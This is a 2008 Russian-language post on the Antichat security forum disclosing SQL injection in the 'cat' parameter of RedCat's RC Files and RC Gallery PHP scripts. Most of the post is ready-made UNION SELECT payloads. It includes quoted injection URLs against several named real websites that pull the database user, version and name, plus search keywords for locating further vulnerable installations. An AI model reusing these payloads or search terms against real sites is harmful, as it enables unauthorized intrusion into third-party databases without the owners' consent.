ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в скриптах от RedCat
  #1  
Старый 02.02.2008, 18:01
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow Уязвимости в скриптах от RedCat

Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии.

-------------------------------------
RC Files v1.0 | Powered by RedCat | ©2004-2008
-------------------------------------

Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.

cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*

гуглим, видим:

Цитата:
http://www.kfmgtu.ru/download/?cat=-3+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9,0/*
Цитата:
http://www.legalref.ru/rc/?cat=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,0/*
...

Уязвима также и версия 1.1, уязвимость аналогичная

Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
-------------------------------------
RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
-------------------------------------

Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.

имеем

Цитата:
http://www.beeland.ru/pc/index.php?page=1&vtype=big&cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
Цитата:
http://www.space-studio.ru/gallery/?cat=-2+union+select+1,2,3,4,user(),6,7/*
Цитата:
http://www.suv4x4.ru/gallery/?cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
...

в версии 2.4 узвимость устранена.

keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat

Последний раз редактировалось Серенький; 02.02.2008 в 19:10..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
[ Обзор: уязвимости cPanel ] Solide Snake Сценарии/CMF/СMS 11 22.11.2008 18:41
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ